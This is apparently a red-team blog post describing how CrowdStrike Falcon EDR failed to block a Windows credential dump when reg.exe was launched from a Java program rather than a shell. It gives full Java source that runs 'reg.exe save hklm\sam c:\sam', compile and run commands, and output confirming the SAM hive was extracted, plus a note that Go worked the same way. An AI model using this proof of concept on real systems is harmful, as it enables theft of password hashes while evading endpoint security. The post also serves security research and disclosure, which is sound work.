by Samuel Pires (sunw4r)

Recently on a Red Team Assessment, after achieving access on the internal network, we noticed that all servers and workstations were protected by Crowd Strike Falcon EDR. It is an awesome tool that actively prevents most known attacks.

In this particular case, our mission was to dump all hashes from a local windows server (with local administrator privileges).

Using the traditional ways of dump:

C:\reg save hklm\sam c:\sam
access denied.

This failure generate a log on the Crowd Strike Console:

This server had Jenkins installed and we noticed that some malicious commands could be executed on the jenkins groovy console. Crowd Strike could not prevent them. So we dumped the hashes using groovy, but we discovered that are easier ways to bypass Crowd Strike prevention. It appears to be connected that if the process is called by a shell (cmd or powershell).

Proof of concept:

Pre requisites: minimum local admin privileges.

We need to execute the application (in this case: reg.exe) without a shell. Almost all workstations from a company have java installed for one reason or another. (If java is not installed, you can download openjdk, extract and use the binaries without installation, 100% portable)

I wrote a very basic simple code, just to execute the process. You can write it on any text editor of your choice, even notepad.

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class FalconBypassTest {

    public static void main(String[] args) {

        ProcessBuilder processBuilder = new ProcessBuilder();
        // Windows
        processBuilder.command("reg.exe", "save", "hklm\\sam", "c:\\sam");

        try {

            Process process = processBuilder.start();

            BufferedReader reader =
                    new BufferedReader(new InputStreamReader(process.getInputStream()));

            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }

            int exitCode = process.waitFor();
            System.out.println("\nExited with error code : " + exitCode);

        } catch (IOException e) {
            e.printStackTrace();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }

    }

}

Save the file as FalconBypassTest.java.

Compiling:

javac.exe FalconBypassTest.java

Executing:

java.exe FalconBypassTest

After the execution, we received the stdout that the operation was completed, and the SAM file was extracted.

The operation completed successfully.

Looking again to the console, we can verify that the action WAS detected, but not blocked. “No action”.

We tried the same POC using golang and the result was the same: if the process is called by something different from shells, no actions are taken by Falcon.